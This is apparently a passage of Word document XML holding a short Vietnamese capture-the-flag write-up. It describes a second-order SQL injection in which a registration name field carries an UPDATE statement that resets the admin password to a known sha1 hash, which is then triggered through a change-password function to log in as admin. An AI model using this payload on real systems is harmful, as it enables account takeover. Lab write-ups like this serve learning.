    <w:p w:rsidR="000D2D06" w:rsidRDefault="000D2D06" w:rsidP="000D2D06">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r>
        <w:t>abcdasd’ update user set password=’</w:t>
      </w:r>
      <w:r>
        <w:t>sha1(</w:t>
      </w:r>
      <w:r>
        <w:t>abcd</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>’ WHERE role = ‘admin’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D2D06" w:rsidRDefault="000D2D06" w:rsidP="000D2D06">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Password: 1234</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D2D06" w:rsidRDefault="000D2D06" w:rsidP="000D2D06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Xem các bài trước thì thấy password bị băm sha1 nên bài này cẩn thận. Băm trước chuỗi password update với hàm băm sha1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D2D06" w:rsidRDefault="00A01C8B" w:rsidP="00B4411B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sau khi tạo được tài khoản. Sử dụng tài khoản đó với chức năng đổi mật khẩu. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A01C8B" w:rsidRDefault="00A01C8B" w:rsidP="00A01C8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sau đó quay lại và đăng nhập với admin password là abcd thì đăng nhập được -&gt; truy vấn sqli đã được thực thi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A01C8B" w:rsidRPr="004F1FDF" w:rsidRDefault="00A01C8B" w:rsidP="00A01C8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lấy cờ và submit :v</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A01C8B" w:rsidRPr="004F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2E82"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0E7AB88E"/>
    <w:lvl w:ilvl="0" w:tplc="9C4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22365"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="493034E8"/>
    <w:lvl w:ilvl="0" w:tplc="6B9EE546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DF"/>
    <w:rsid w:val="000D2D06"/>
    <w:rsid w:val="001C798A"/>
    <w:rsid w:val="00217EB0"/>
    <w:rsid w:val="00291B3C"/>
    <w:rsid w:val="002C48BB"/>
    <w:rsid w:val="002E5383"/>
    <w:rsid w:val="004930D4"/>
    <w:rsid w:val="004A09E2"/>
    <w:rsid w:val="004F1FDF"/>
    <w:rsid w:val="0050495A"/>
    <w:rsid w:val="0056740C"/>
    <w:rsid w:val="0062149A"/>
    <w:rsid w:val="00666D0F"/>
    <w:rsid w:val="007332B0"/>
    <w:rsid w:val="00751BE6"/>
    <w:rsid w:val="008048C4"/>
    <w:rsid w:val="00845EC3"/>
    <w:rsid w:val="00893C2F"/>
    <w:rsid w:val="008B5447"/>
    <w:rsid w:val="00926F35"/>
    <w:rsid w:val="009613C5"/>
    <w:rsid w:val="00A01C8B"/>
    <w:rsid w:val="00A04AA0"/>
    <w:rsid w:val="00A232DC"/>
    <w:rsid w:val="00A453D4"/>
    <w:rsid w:val="00B4411B"/>
    <w:rsid w:val="00B8206F"/>
    <w:rsid w:val="00D43E0B"/>
    <w:rsid w:val="00D87AE6"/>
    <w:rsid w:val="00E062A5"/>
    <w:rsid w:val="00E378BF"/>
    <w:rsid w:val="00E8417A"/>
    <w:rsid w:val="00F02D9C"/>
    <w:rsid w:val="00F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D8AB-8558-4E6C-ACC5-AE0BB273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DF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4F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Quốc</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nguyễn Minh Quốc</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-01T02:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-05T02:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>